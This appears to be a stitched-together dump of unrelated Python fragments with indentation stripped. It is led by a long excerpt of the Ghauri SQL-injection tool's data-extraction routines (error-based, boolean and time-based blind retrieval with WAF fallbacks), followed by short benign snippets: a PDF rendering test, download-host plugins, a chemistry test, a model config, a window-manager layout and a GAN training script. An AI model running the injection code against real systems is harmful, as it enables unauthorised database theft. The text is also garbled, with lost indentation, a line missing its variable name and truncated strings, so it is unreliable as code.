except KeyboardInterrupt:
is_length_found = True
length = 0
break
if (len(chars) == noc):
if (not suppress_output):
logger.info(f'retrieved: {chars}')
length = (int(chars) if chars.isdigit() else 0)
is_length_found = True
break
if is_length_found:
break
return length
def fetch_using_error_based_vector(self, url, data, parameter, headers, injection_type, payloads, backend='', proxy=None, is_multipart=False, timeout=30, delay=0, timesec=5, suppress_output=False, query_check=False, text_only=False, retry=3, dump_type=None):
PayloadResponse = collections.namedtuple('PayloadResponse', ['ok', 'error', 'result', 'payload', 'resumed'])
_temp = PayloadResponse(ok=False, error='', result='', payload='', resumed=False)
error_based_in_vectors = bool(('error_vector' in conf.vectors))
start = 0
end = len(payloads)
= 0
error_msg = None
retry_on_error = 0
is_resumed = False
if (dump_type and (not conf.fresh_queries)):
retval_session = session.fetchall(session_filepath=conf.session_filepath, query='SELECT * FROM storage WHERE `type`=?', values=(dump_type,))
if retval_session:
retval_session = retval_session.pop()
is_resumed = True
result = retval_session.get('value')
length = retval_session.get('length')
logger.progress(f'resumed: {result}')
last_row_id = retval_session.get('id')
if (len(result) == length):
_temp = PayloadResponse(ok=True, error='', result=result, payload='', resumed=is_resumed)
return _temp
if error_based_in_vectors:
vector = conf.vectors.get('error_vector')
while (start < end):
entry = payloads[start]
response_string = ''
if (delay > 0):
time.sleep(delay)
expression = vector.replace('[INFERENCE]', f'{entry}')
if (backend == 'Microsoft SQL Server'):
expression = expression.replace('+', '%2b')
logger.payload(f'{expression}')
try:
attack = inject_expression(url=url, data=data, proxy=proxy, delay=delay, timesec=timesec, timeout=timeout, headers=headers, parameter=parameter, expression=expression, is_multipart=is_multipart, injection_type=injection_type)
response_string = (attack.filtered_text if text_only else attack.text)
start += 1
except KeyboardInterrupt as error:
logger.warning('user aborted during data extraction phase')
quest = logger.read_input('how do you want to proceed? [(C)continue/(e)nd this phase/(q)uit] ', batch=False, user_input='C')
if (quest and (quest == 'e')):
_temp = PayloadResponse(ok=False, error='user_ended', result='', payload='', resumed=is_resumed)
return _temp
if (quest and (quest == 'q')):
logger.error('user quit')
logger.end('ending')
exit(0)
except ConnectionAbortedError as e:
logger.critical(f'connection attempt to the target URL was aborted by the peer, Ghauri is going to retry')
retry_on_error += 1
except ConnectionRefusedError as e:
logger.critical(f'connection attempt to the target URL was refused by the peer. Ghauri is going to retry')
retry_on_error += 1
except ConnectionResetError as e:
logger.critical(f'connection attempt to the target URL was reset by the peer. Ghauri is going to retry')
retry_on_error += 1
except Exception as error:
logger.critical(f'error {error}, during detection phase. Ghauri is going to retry')
retry_on_error += 1
retval = search_regex(pattern=(REGEX_XPATH, REGEX_ERROR_BASED, REGEX_BIGINT_BASED, REGEX_DOUBLE_BASED, REGEX_GEOMETRIC_BASED, REGEX_GTID_BASED, REGEX_JSON_KEYS, REGEX_GENERIC, REGEX_MSSQL_STRING, REGEX_GENERIC_ERRORS), string=response_string, default=None, group='error_based_response')
if retval:
if (retval != '<blank_value>'):
if (backend == 'Microsoft SQL Server'):
if (entry.endswith('sysobjects)') or entry.endswith('..syscolumns)')):
logger.debug(f"entries found with query '{entry}': {retval}, setting the return to 1 as we can't use where clause in query..")
retval = '1'
logger.warning('the SQL query provided does not return any output')
logger.warning('it was not possible to count the number of entries for the SQL query provided. Ghauri will assume that it returns only one entry')
try:
if (dump_type and (not conf.fresh_queries)):
session.dump(session_filepath=conf.session_filepath, query=STORAGE, values=(retval, len(retval), dump_type))
except Exception as error:
logger.warning(error)
_temp = PayloadResponse(ok=True, error='', result=retval, payload=entry, resumed=is_resumed)
break
return _temp
def fetch_characters(self, url, data, vector, parameter, headers, base, injection_type, payloads, backend='', proxy=None, is_multipart=False, timeout=30, delay=0, timesec=5, attack01=None, code=None, match_string=None, not_match_string=None, suppress_output=False, query_check=False, list_of_chars=None, text_only=False, dump_type=None):
PayloadResponse = collections.namedtuple('PayloadResponse', ['ok', 'error', 'result', 'payload', 'resumed'])
_temp = PayloadResponse(ok=False, error='', result='', payload='', resumed=False)
other_vectors = bool((('boolean_vector' in conf.vectors) or ('time_vector' in conf.vectors)))
retval_error = self.fetch_using_error_based_vector(url, data, parameter, headers, injection_type, payloads, backend=backend, proxy=proxy, is_multipart=is_multipart, timeout=timeout, delay=delay, timesec=timesec, suppress_output=suppress_output, query_check=query_check, text_only=text_only, dump_type=dump_type)
if retval_error.ok:
_temp_error = PayloadResponse(ok=retval_error.ok, error=retval_error.error, result=retval_error.result, payload=retval_error.payload, resumed=retval_error.resumed)
return _temp_error
if (not retval_error.ok):
if (retval_error.error == 'user_ended'):
_temp_error = PayloadResponse(ok=retval_error.ok, error=retval_error.error, result=retval_error.result, payload=retval_error.payload, resumed=retval_error.resumed)
return _temp_error
if (not list_of_chars):
list_of_chars = '._-+!#$%^&*()+'
data_extraction_payloads = DATA_EXTRACTION_PAYLOADS.get(backend)
if isinstance(data_extraction_payloads, dict):
data_extraction_payloads = [data_extraction_payloads]
attack_url = url
attack_data = data
attack_headers = headers
user_aborted = False
change_algo_on_invalid_character = False
invalid_character_detection_counter = 0
bool_invalid_character_counter = 0
is_change_algo_notified = False
binary_search = False
in_based_search = False
linear_search = False
between_based_search = False
is_resumed = False
start_pos = 1
start_chars = ''
if (dump_type and (not conf.fresh_queries)):
retval_session = session.fetchall(session_filepath=conf.session_filepath, query='SELECT * FROM storage WHERE `type`=?', values=(dump_type,))
if retval_session:
retval_session = retval_session.pop()
is_resumed = True
_v = retval_session.get('value')
length = retval_session.get('length')
start_pos = (len(_v) + 1)
start_chars = _v
logger.progress(f'resumed: {_v}')
last_row_id = retval_session.get('id')
if (len(_v) == length):
_temp = PayloadResponse(ok=True, error='', result=_v, payload='', resumed=is_resumed)
return _temp
for (vector_type, vector) in conf.vectors.items():
if (vector_type in ['error_vector']):
continue
if (not is_resumed):
length = self.fetch_length(url, data, vector, parameter, headers, base, injection_type, payloads=payloads, backend=backend, proxy=proxy, is_multipart=is_multipart, timeout=timeout, delay=delay, timesec=timesec, attack01=attack01, code=code, match_string=match_string, not_match_string=not_match_string, query_check=query_check, suppress_output=suppress_output, text_only=text_only, vector_type=vector_type)
if (length == 0):
logger.warning('it was not possible to extract query output length for the SQL query provided.')
continue
if query_check:
return PayloadResponse(ok=True, error='', result='', payload=length, resumed=False)
try:
if ((not is_resumed) and dump_type and (not conf.fresh_queries)):
last_row_id = session.dump(session_filepath=conf.session_filepath, query=STORAGE, values=('', length, dump_type))
except Exception as error:
logger.warning(error)
is_done_with_vector = False
retval_check = self._check_operator(url, data, vector, parameter, headers, base, injection_type, proxy=proxy, is_multipart=is_multipart, timeout=timeout, delay=delay, timesec=timesec, attack01=attack01, match_string=match_string, not_match_string=not_match_string, vector_type=vector_type, text_only=text_only)
if retval_check.ok:
binary_search = retval_check.binary_search
in_based_search = retval_check.in_based_search
linear_search = retval_check.linear_search
between_based_search = retval_check.between_based_search
if (not retval_check.ok):
logger.critical("ghauri will not be able to extract data as '=', 'IN' and '>' all are filtered by back-end server..")
logger.end('ending')
exit(0)
for entries in data_extraction_payloads:
is_extracted = False
for (_, value) in entries.items():
is_char_found = False
for entry in payloads:
chars = start_chars
pos = start_pos
total_length = (length + 1)
if (conf.threads and (not binary_search) and (not in_based_search) and (not between_based_search)):
logger.debug('Ghauri will use a fallback leaner search to guess character(s), adjusting threads to 1')
conf.threads = None
if (conf.threads and (vector_type == 'boolean_vector')):
if (not conf.thread_warning):
logger.debug('it is recommended not to use threads for data exfiltration, it could cause harm to backend DBMS or result in incorrect character(s) guessing.')
conf.thread_warning = True
[conf._thread_chars_query.update({offset: '_'}) for offset in range(pos, total_length)]
if (chars and (len(chars) >= 1)):
logger.debug('appending characters found already')
for (_, ch) in enumerate(chars):
conf._thread_chars_query.update({(_ + 1): ch})
conf._thread_chars_query = collections.OrderedDict(sorted(conf._thread_chars_query.items()))
if (conf.threads > conf._max_threads):
conf.threads = conf._max_threads
if (not conf.max_threads_warning):
logger.warning(f"""Ghauri recommends using threads upto {conf._max_threads}. adjusting '--threads="{conf._max_threads}"'.""")
conf.max_threads_warning = True
with futures.ThreadPoolExecutor(max_workers=conf.threads) as ex:
exfiltration_func = None
if binary_search:
exfiltration_func = self._binary_search
if in_based_search:
exfiltration_func = self._search_using_in_operator
if between_based_search:
exfiltration_func = self._search_using_between_operator
exec_map = {ex.submit(exfiltration_func, url=url, data=data, vector=vector, parameter=parameter, headers=headers, base=base, injection_type=injection_type, delay=delay, timesec=timesec, timeout=timeout, proxy=proxy, attack01=attack01, code=code, match_string=match_string, not_match_string=not_match_string, is_multipart=is_multipart, suppress_output=suppress_output, query_check=query_check, minimum=32, maximum=127, offset=offset, expression_payload=value, queryable=entry, chars=chars, text_only=text_only, vector_type=vector_type): offset for offset in range(pos, total_length)}
try:
for future in futures.as_completed(exec_map):
offset = exec_map[future]
logger.progress('retrieved: {}'.format(chars))
try:
character = future.result()
except Exception as exc:
logger.error(f" * generated an exception: '{exc}' on offset '{offset}'")
except KeyboardInterrupt as error:
raise error
else:
if (character and (character != '') and (character is not None)):
conf._thread_chars_query.update({offset: character})
except KeyboardInterrupt as error:
logger.error('user aborted, terminating threads gracefully')
raise error
chars = ''.join([str(i) for i in collections.OrderedDict(sorted(conf._thread_chars_query.items())).values()])
conf._thread_chars_query = {}
with conf.lock:
try:
if (dump_type and chars and (not conf.fresh_queries)):
session.dump(session_filepath=conf.session_filepath, query=STORAGE_UPDATE, values=(chars, last_row_id, dump_type))
except Exception as error:
logger.warning(error)
logger.debug(f"character(s) found: '{chars}'")
else:
while (pos < total_length):
start_pos = pos
if (attack01 and (vector_type == 'boolean_vector')):
try:
if binary_search:
retval = self._binary_search(url=url, data=data, vector=vector, parameter=parameter, headers=headers, base=base, injection_type=injection_type, delay=delay, timesec=timesec, timeout=timeout, proxy=proxy, attack01=attack01, code=code, match_string=match_string, not_match_string=not_match_string, is_multipart=is_multipart, suppress_output=suppress_output, query_check=query_check, minimum=32, maximum=127, offset=pos, expression_payload=value, queryable=entry, chars=chars, text_only=text_only, vector_type=vector_type)
if retval:
is_valid = self.validate_character(url=url, data=data, vector=vector, parameter=parameter, headers=headers, base=base, injection_type=injection_type, proxy=proxy, is_multipart=is_multipart, timeout=timeout, delay=delay, timesec=timesec, identified_character=retval, vector_type=vector_type, offset=pos, expression_payload=value, queryable=entry, code=code, match_string=match_string, not_match_string=not_match_string, attack01=attack01)
if (not is_valid):
logger.warning('invalid character detected, retrying.')
bool_invalid_character_counter += 1
binary_search = False
between_based_search = True
in_based_search = False
linear_search = False
if is_valid:
pos += 1
chars += retval
elif between_based_search:
retval = self._search_using_between_operator(url=url, data=data, vector=vector, parameter=parameter, headers=headers, base=base, injection_type=injection_type, delay=delay, timesec=timesec, timeout=timeout, proxy=proxy, attack01=attack01, code=code, match_string=match_string, not_match_string=not_match_string, is_multipart=is_multipart, suppress_output=suppress_output, query_check=query_check, minimum=32, maximum=127, offset=pos, expression_payload=value, queryable=entry, chars=chars, text_only=text_only, vector_type=vector_type)
if retval:
is_valid = self.validate_character(url=url, data=data, vector=vector, parameter=parameter, headers=headers, base=base, injection_type=injection_type, proxy=proxy, is_multipart=is_multipart, timeout=timeout, delay=delay, timesec=timesec, identified_character=retval, vector_type=vector_type, offset=pos, expression_payload=value, queryable=entry, code=code, match_string=match_string, not_match_string=not_match_string, attack01=attack01)
if (not is_valid):
logger.warning('invalid character detected, retrying.')
bool_invalid_character_counter += 1
binary_search = False
between_based_search = False
in_based_search = True
linear_search = False
if is_valid:
pos += 1
chars += retval
elif in_based_search:
retval = self._search_using_in_operator(url=url, data=data, vector=vector, parameter=parameter, headers=headers, base=base, injection_type=injection_type, delay=delay, timesec=timesec, timeout=timeout, proxy=proxy, attack01=attack01, match_string=match_string, not_match_string=not_match_string, text_only=text_only, is_multipart=is_multipart, suppress_output=suppress_output, query_check=query_check, minimum=32, maximum=127, offset=pos, expression_payload=value, queryable=entry, chars=chars, vector_type=vector_type)
if retval:
is_valid = self.validate_character(url=url, data=data, vector=vector, parameter=parameter, headers=headers, base=base, injection_type=injection_type, proxy=proxy, is_multipart=is_multipart, timeout=timeout, delay=delay, timesec=timesec, identified_character=retval, vector_type=vector_type, offset=pos, expression_payload=value, queryable=entry, code=code, match_string=match_string, not_match_string=not_match_string, attack01=attack01)
if (not is_valid):
logger.warning('invalid character detected, retrying.')
bool_invalid_character_counter += 1
binary_search = False
in_based_search = False
linear_search = True
if is_valid:
pos += 1
chars += retval
else:
retval = self._linear_search(url=url, data=data, vector=vector, parameter=parameter, headers=headers, injection_type=injection_type, proxy=proxy, attack01=attack01, is_multipart=is_multipart, timeout=timeout, match_string=match_string, not_match_string=not_match_string, text_only=text_only, delay=delay, timesec=timesec, suppress_output=suppress_output, expression_payload=value, queryable=entry, chars=chars, offset=pos, list_of_chars=list_of_chars, vector_type=vector_type, base=base)
if retval:
is_valid = self.validate_character(url=url, data=data, vector=vector, parameter=parameter, headers=headers, base=base, injection_type=injection_type, proxy=proxy, is_multipart=is_multipart, timeout=timeout, delay=delay, timesec=timesec, identified_character=retval, vector_type=vector_type, offset=pos, expression_payload=value, queryable=entry, code=code, match_string=match_string, not_match_string=not_match_string, attack01=attack01)
if (not is_valid):
logger.warning('invalid character detected, retrying.')
bool_invalid_character_counter += 1
binary_search = retval_check.binary_search
in_based_search = retval_check.in_based_search
linear_search = retval_check.linear_search
if is_valid:
pos += 1
chars += retval
try:
if (bool_invalid_character_counter >= 3):
logger.debug('it seems the current payload is filtered out by some sort of WAF/IDS.')
break
if (dump_type and chars and (not conf.fresh_queries)):
session.dump(session_filepath=conf.session_filepath, query=STORAGE_UPDATE, values=(chars, last_row_id, dump_type))
except Exception as error:
logger.warning(error)
logger.debug(f"character(s) found: '{str(chars)}'")
except KeyboardInterrupt:
is_char_found = True
is_extracted = True
is_done_with_vector = True
if (chars and (len(chars) > 0)):
logger.info(f"retrieved: '{chars}'")
_temp = PayloadResponse(ok=False, error='user_ended', result=chars, payload=entry, resumed=False)
break
if (vector_type == 'time_vector'):
try:
if binary_search:
retval = self._binary_search(url=url, data=data, vector=vector, parameter=parameter, headers=headers, base=base, injection_type=injection_type, delay=delay, timesec=timesec, timeout=timeout, proxy=proxy, is_multipart=is_multipart, suppress_output=suppress_output, query_check=query_check, minimum=32, maximum=127, offset=pos, expression_payload=value, queryable=entry, chars=chars, vector_type=vector_type)
if retval:
is_valid = self.validate_character(url=url, data=data, vector=vector, parameter=parameter, headers=headers, base=base, injection_type=injection_type, proxy=proxy, is_multipart=is_multipart, timeout=timeout, delay=delay, timesec=timesec, identified_character=retval, vector_type=vector_type, offset=pos, expression_payload=value, queryable=entry)
if (not is_valid):
logger.warning('invalid character detected, retrying.')
invalid_character_detection_counter += 1
binary_search = False
in_based_search = True
linear_search = False
if is_valid:
pos += 1
chars += retval
elif in_based_search:
retval = self._search_using_in_operator(url=url, data=data, vector=vector, parameter=parameter, headers=headers, base=base, injection_type=injection_type, delay=delay, timesec=timesec, timeout=timeout, proxy=proxy, is_multipart=is_multipart, suppress_output=suppress_output, query_check=query_check, minimum=32, maximum=127, offset=pos, expression_payload=value, queryable=entry, chars=chars, vector_type=vector_type)
if retval:
is_valid = self.validate_character(url=url, data=data, vector=vector, parameter=parameter, headers=headers, base=base, injection_type=injection_type, proxy=proxy, is_multipart=is_multipart, timeout=timeout, delay=delay, timesec=timesec, identified_character=retval, vector_type=vector_type, offset=pos, expression_payload=value, queryable=entry)
if (not is_valid):
logger.warning('invalid character detected, retrying..')
invalid_character_detection_counter += 1
binary_search = False
in_based_search = False
linear_search = True
if is_valid:
pos += 1
chars += retval
else:
retval = self._linear_search(url=url, data=data, vector=vector, parameter=parameter, headers=headers, injection_type=injection_type, proxy=proxy, is_multipart=is_multipart, timeout=timeout, delay=delay, timesec=timesec, suppress_output=suppress_output, expression_payload=value, queryable=entry, chars=chars, offset=pos, list_of_chars=list_of_chars, vector_type=vector_type)
if retval:
is_valid = self.validate_character(url=url, data=data, vector=vector, parameter=parameter, headers=headers, base=base, injection_type=injection_type, proxy=proxy, is_multipart=is_multipart, timeout=timeout, delay=delay, timesec=timesec, identified_character=retval, vector_type=vector_type, offset=pos, expression_payload=value, queryable=entry)
if (not is_valid):
logger.warning('invalid character detected, retrying..')
invalid_character_detection_counter += 1
binary_search = retval_check.binary_search
in_based_search = retval_check.in_based_search
linear_search = retval_check.linear_search
if is_valid:
pos += 1
chars += retval
chars += retval
pos += 1
try:
if (invalid_character_detection_counter >= 3):
logger.debug('it seems the current payload is filtered out by some sort of WAF/IDS.')
break
if (dump_type and chars and (not conf.fresh_queries)):
session.dump(session_filepath=conf.session_filepath, query=STORAGE_UPDATE, values=(chars, last_row_id, dump_type))
except Exception as error:
logger.warning(error)
logger.debug(f"character(s) found: '{str(chars)}'")
except KeyboardInterrupt:
is_char_found = True
is_extracted = True
is_done_with_vector = True
if (chars and (len(chars) > 0)):
logger.info(f"retrieved: '{chars}'")
_temp = PayloadResponse(ok=False, error='user_ended', result=chars, payload=entry, resumed=is_resumed)
break
if (len(chars) == length):
is_char_found = True
_temp = PayloadResponse(ok=True, error='', result=chars, payload=entry, resumed=False)
response = chars
break
if is_char_found:
is_extracted = True
break
if is_extracted:
is_done_with_vector = True
break
if (not is_done_with_vector):
logger.debug(f"Ghauri was not able to extract the data with vector type '{vector_type}', switching to other vector type(s) if any..")
if is_done_with_vector:
break
return _temp |
def render_pdffile_topil(multipage_doc):
renderer = multipage_doc.render(pdfium.PdfBitmap.to_pil, scale=0.5)
imgs = []
for image in renderer:
assert isinstance(image, PIL.Image.Image)
assert (image.mode == 'RGB')
imgs.append(image)
assert (len(imgs) == 3)
(yield imgs) |
class LinksnappyCom(MultiAccount):
__name__ = 'LinksnappyCom'
__type__ = 'account'
__version__ = '0.22'
__status__ = 'testing'
__config__ = [('mh_mode', 'all;listed;unlisted', 'Filter downloaders to use', 'all'), ('mh_list', 'str', 'Downloader list (comma separated)', ''), ('mh_interval', 'int', 'Reload interval in hours', 12)]
__description__ = 'Linksnappy.com account plugin'
__license__ = 'GPLv3'
__authors__ = [('stickell', 'l.'), ('GammaC0de', 'nitzo2001[AT]yahoo[DOT]com')]
API_URL = '
def api_request(self, method, **kwargs):
return json.loads(self.load((self.API_URL + method), get=kwargs))
def grab_hosters(self, user, password, data):
json_data = self.api_request('FILEHOSTS')
return [k for (k, v) in json_data['return'].items() if (v['Status'] == '1')]
def grab_info(self, user, password, data):
premium = True
validuntil = None
trafficleft = None
json_data = self.api_request('USERDETAILS', username=user, password=password)
if (json_data['status'] != 'OK'):
self.log_error(json_data['error'])
else:
expire = json_data['return']['expire']
if (expire == 'lifetime'):
validuntil = (- 1)
elif (expire == 'expired'):
premium = False
else:
validuntil = float(expire)
if isinstance(json_data['return'].get('trafficleft', ''), str):
trafficleft = (- 1)
else:
trafficleft = (float(json_data['return']['trafficleft']) * 1024)
return {'premium': premium, 'validuntil': validuntil, 'trafficleft': trafficleft}
def signin(self, user, password, data):
json_data = self.api_request('AUTHENTICATE', username=user, password=password)
if (json_data['status'] != 'OK'):
self.fail_login(json_data['error']) |
def setUpModule():
global mol, m, h1e, g2e, ci0, cis
global norb, nelec, orbsym
mol = gto.Mole()
mol.verbose = 0
mol.atom = '\n O 0. 0. 0.\n H 0. -0.757 0.587\n H 0. 0.757 0.587'
mol.basis = 'sto-3g'
mol.symmetry = 'c2v'
mol.build()
m = scf.RHF(mol)
m.conv_tol_grad = 1e-08
ehf = m.scf()
norb = m.mo_coeff.shape[1]
nelec = mol.nelectron
h1e = reduce(numpy.dot, (m.mo_coeff.T, scf.hf.get_hcore(mol), m.mo_coeff))
g2e = ao2mo.incore.full(m._eri, m.mo_coeff)
orbsym = m.orbsym
cis = fci.direct_spin0_symm.FCISolver(mol)
cis.orbsym = orbsym
numpy.random.seed(15)
na = fci.cistring.num_strings(norb, (nelec // 2))
ci0 = numpy.random.random((na, na))
ci0 = ((ci0 + ci0.T) * 0.5) |
class FilerNetFolder(SimpleDecrypter):
__name__ = 'FilerNetFolder'
__type__ = 'decrypter'
__version__ = '0.48'
__status__ = 'testing'
__pattern__ = '
__config__ = [('enabled', 'bool', 'Activated', True), ('use_premium', 'bool', 'Use premium account if available', True), ('folder_per_package', 'Default;Yes;No', 'Create folder for each package', 'Default'), ('max_wait', 'int', 'Reconnect if waiting time is greater than minutes', 10)]
__description__ = 'Filer.net decrypter plugin'
__license__ = 'GPLv3'
__authors__ = [('nath_schwarz', 'nathan.'), ('stickell', 'l.')]
LINK_PATTERN = 'href="(/get/\\w{16})">(?!<)'
NAME_PATTERN = '<h3>(?P<N>.+?) - <small'
OFFLINE_PATTERN = 'Nicht gefunden' |
def test_wr_As_wr_A_conflict():
class Top(ComponentLevel3):
def construct(s):
s.A = Wire(Bits32)
def up_wr_As():
s.A[1:3] = Bits2(2)
def up_wr_A():
s.A = Bits32(123)
try:
_test_model(Top)
except MultiWriterError as e:
print('{} is thrown\n{}'.format(e.__class__.__name__, e))
return
raise Exception("Should've thrown MultiWriterError.") |
class GPTNeoXConfig(PretrainedConfig):
model_type = 'gpt_neox'
def __init__(self, vocab_size=50432, hidden_size=6144, num_hidden_layers=44, num_attention_heads=64, intermediate_size=24576, hidden_act='gelu', rotary_pct=0.25, rotary_emb_base=10000, max_position_embeddings=2048, initializer_range=0.02, layer_norm_eps=1e-05, use_cache=True, bos_token_id=0, eos_token_id=2, tie_word_embeddings=False, **kwargs):
super().__init__(bos_token_id=bos_token_id, eos_token_id=eos_token_id, **kwargs)
self.vocab_size = vocab_size
self.max_position_embeddings = max_position_embeddings
self.hidden_size = hidden_size
self.num_hidden_layers = num_hidden_layers
self.num_attention_heads = num_attention_heads
self.intermediate_size = intermediate_size
self.hidden_act = hidden_act
self.rotary_pct = rotary_pct
self.rotary_emb_base = rotary_emb_base
self.initializer_range = initializer_range
self.layer_norm_eps = layer_norm_eps
self.use_cache = use_cache
self.tie_word_embeddings = tie_word_embeddings |
class Groups(object):
def init_groups(self):
layout = Layouts()
return [Group('SYS', layouts=[layout.max(), layout.two_stackWide(), layout.two_stackTall()]), Group('CLI', layouts=[layout.two_stackTall(), layout.monadTall(), layout.ten_monadWide()], matches=[Match(title=['Irssi', 'Mpsyt'])]), Group('TYP', layouts=[layout.five_monadTall(), layout.two_stackTall(), layout.two_stackWide()], matches=[Match(wm_class=['Subl3', 'Howl', 'Geany'])]), Group('VRT', layouts=[layout.floating()], matches=[Match(wm_class=['Xephyr', 'Virt-manager', re.compile('VirtualBox')])]), Group('MNG', layouts=[layout.max()], matches=[Match(wm_class=['Nemo'])]), Group('AUX', layouts=[layout.max(), layout.ten_monadWide()]), Group('DOC', layouts=[layout.two_stackTall(), layout.max(), layout.two_stackWide()], matches=[Match(wm_class=['Zathura', 'Evince'])]), Group('OFC', layouts=[layout.max(), layout.two_stackWide()], matches=[Match(wm_class=['calibre', re.compile('NetBeans')]), Match(title=[re.compile('LibreOffice')])]), Group('GPX', layouts=[layout.max(), layout.two_stackWide()], matches=[Match(wm_class=['Glade', 'Inkscape', 'mpv', re.compile('Gimp')])]), Group('TCM', layouts=[layout.max(), layout.two_stackTall()], matches=[Match(wm_class=['Tor Browser', 'firefox', 'qutebrowser', 'Chromium', 'Links']), Match(title=['Links'])]), Group('', layouts=[layout.floating()])] |
def create_bottom_up_layers(input_mlp_out: Tensor, num_layers: int, base_num_filters: int, max_num_filters: int, bottom_up_stack: BottomUpStackInterface) -> List[BottomUpLayer]:
bottom_up_layers = []
num_filters_out = min(max_num_filters, base_num_filters)
x = bottom_up_stack.convolve(input_mlp_out, num_filters_out, 0)
bottom_up_layers.append(BottomUpLayer(x, num_filters_out))
for layer_index in range(1, num_layers):
num_filters_in = num_filters_out
num_filters_out = min(max_num_filters, ((2 ** layer_index) * base_num_filters))
x = bottom_up_stack.downsample_and_convolve(x, num_filters_in, num_filters_out, layer_index)
bottom_up_layers.append(BottomUpLayer(x, num_filters_out))
return bottom_up_layers |
def main():
parser = argparse.ArgumentParser(description='Train Blending GAN')
parser.add_argument('--nef', type=int, default=64, help='# of base filters in encoder')
parser.add_argument('--ngf', type=int, default=64, help='# of base filters in decoder')
parser.add_argument('--nc', type=int, default=3, help='# of output channels in decoder')
parser.add_argument('--nBottleneck', type=int, default=4000, help='# of output channels in encoder')
parser.add_argument('--ndf', type=int, default=64, help='# of base filters in D')
parser.add_argument('--lr_d', type=float, default=0.0002, help='Learning rate for Critic, default=0.0002')
parser.add_argument('--lr_g', type=float, default=0.002, help='Learning rate for Generator, default=0.002')
parser.add_argument('--beta1', type=float, default=0.5, help='Beta for Adam, default=0.5')
parser.add_argument('--l2_weight', type=float, default=0.999, help='Weight for l2 loss, default=0.999')
parser.add_argument('--gpu', type=int, default=0, help='GPU ID (negative value indicates CPU)')
parser.add_argument('--n_epoch', type=int, default=25, help='# of epochs to train for')
parser.add_argument('--data_root', help='Path to dataset')
parser.add_argument('--load_size', type=int, default=64, help='Scale image to load_size')
parser.add_argument('--image_size', type=int, default=64, help='The height / width of the input image to network')
parser.add_argument('--ratio', type=float, default=0.5, help='Ratio for center square size v.s. image_size')
parser.add_argument('--val_ratio', type=float, default=0.05, help='Ratio for validation set v.s. data set')
parser.add_argument('--d_iters', type=int, default=5, help='# of D iters per each G iter')
parser.add_argument('--clamp_lower', type=float, default=(- 0.01), help='Lower bound for clipping')
parser.add_argument('--clamp_upper', type=float, default=0.01, help='Upper bound for clipping')
parser.add_argument('--experiment', default='encoder_decoder_blending_result', help='Where to store samples and models')
parser.add_argument('--test_folder', default='samples', help='Where to store test results')
parser.add_argument('--workers', type=int, default=4, help='# of data loading workers')
parser.add_argument('--batch_size', type=int, default=64, help='Input batch size')
parser.add_argument('--test_size', type=int, default=64, help='Batch size for testing')
parser.add_argument('--train_samples', type=int, default=150000, help='# of training examples')
parser.add_argument('--test_samples', type=int, default=256, help='# of testing examples')
parser.add_argument('--manual_seed', type=int, default=5, help='Manul seed')
parser.add_argument('--resume', default='', help='Resume the training from snapshot')
parser.add_argument('--snapshot_interval', type=int, default=1, help='Interval of snapshot (epochs)')
parser.add_argument('--print_interval', type=int, default=1, help='Interval of printing log to console (iteration)')
parser.add_argument('--plot_interval', type=int, default=10, help='Interval of plot (iteration)')
args = parser.parse_args()
random.seed(args.manual_seed)
print('Input arguments:')
for (key, value) in vars(args).items():
print('\t{}: {}'.format(key, value))
print('')
print('Create & Init models ...')
print('\tInit G network ...')
G = EncoderDecoder(args.nef, args.ngf, args.nc, args.nBottleneck, image_size=args.image_size, conv_init=init_conv, bn_init=init_bn)
print('\tInit D network ...')
D = DCGAN_D(args.image_size, args.ndf, conv_init=init_conv, bn_init=init_bn)
if (args.gpu >= 0):
print('\tCopy models to gpu {} ...'.format(args.gpu))
chainer.cuda.get_device(args.gpu).use()
G.to_gpu()
D.to_gpu()
print('Init models done ...\n')
optimizer_d = make_optimizer(D, args.lr_d, args.beta1)
optimizer_g = make_optimizer(G, args.lr_g, args.beta1)
print('Load images from {} ...'.format(args.data_root))
folders = sorted([folder for folder in os.listdir(args.data_root) if os.path.isdir(os.path.join(args.data_root, folder))])
val_end = int((args.val_ratio * len(folders)))
print('\t{} folders in total, {} val folders ...'.format(len(folders), val_end))
trainset = BlendingDataset(args.train_samples, folders[val_end:], args.data_root, args.ratio, args.load_size, args.image_size)
valset = BlendingDataset(args.test_samples, folders[:val_end], args.data_root, args.ratio, args.load_size, args.image_size)
print('\tTrainset contains {} image files'.format(len(trainset)))
print('\tValset contains {} image files'.format(len(valset)))
print('')
train_iter = chainer.iterators.MultiprocessIterator(trainset, args.batch_size, n_processes=args.workers, n_prefetch=args.workers)
updater = EncoderDecoderBlendingUpdater(models=(G, D), args=args, iterator=train_iter, optimizer={'main': optimizer_g, 'D': optimizer_d}, device=args.gpu)
trainer = training.Trainer(updater, (args.n_epoch, 'epoch'), out=args.experiment)
snapshot_interval = (args.snapshot_interval, 'epoch')
trainer.extend(extensions.snapshot(filename='snapshot_epoch_{.updater.epoch}.npz'), trigger=snapshot_interval)
trainer.extend(extensions.snapshot_object(G, 'g_epoch_{.updater.epoch}.npz'), trigger=snapshot_interval)
trainer.extend(extensions.snapshot_object(D, 'd_epoch_{.updater.epoch}.npz'), trigger=snapshot_interval)
print_interval = (args.print_interval, 'iteration')
trainer.extend(extensions.LogReport(trigger=print_interval))
trainer.extend(extensions.PrintReport(['iteration', 'main/loss', 'D/loss', 'main/l2_loss']), trigger=print_interval)
trainer.extend(extensions.ProgressBar(update_interval=args.print_interval))
trainer.extend(extensions.dump_graph('D/loss', out_name='TrainGraph.dot'))
plot_interval = (args.plot_interval, 'iteration')
trainer.extend(extensions.PlotReport(['main/loss'], 'iteration', file_name='loss.png', trigger=plot_interval))
trainer.extend(extensions.PlotReport(['D/loss'], 'iteration', file_name='d_loss.png', trigger=plot_interval))
trainer.extend(extensions.PlotReport(['main/l2_loss'], 'iteration', file_name='l2_loss.png', trigger=plot_interval))
path = os.path.join(args.experiment, args.test_folder)
if (not os.path.isdir(path)):
os.makedirs(path)
print('Saving samples to {} ...\n'.format(path))
train_batch = [trainset[idx][0] for idx in range(args.test_size)]
train_v = Variable(chainer.dataset.concat_examples(train_batch, args.gpu))
trainer.extend(sampler(G, path, train_v, 'fake_samples_train_{}.png'), trigger=plot_interval)
val_batch = [valset[idx][0] for idx in range(args.test_size)]
val_v = Variable(chainer.dataset.concat_examples(val_batch, args.gpu))
trainer.extend(sampler(G, path, val_v, 'fake_samples_val_{}.png'), trigger=plot_interval)
if args.resume:
print('Resume from {} ... \n'.format(args.resume))
chainer.serializers.load_npz(args.resume, trainer)
print('Training start ...\n')
trainer.run() |
def test_compare_DA_pn():
from solcore import material, si
from solcore.structure import Junction, Layer
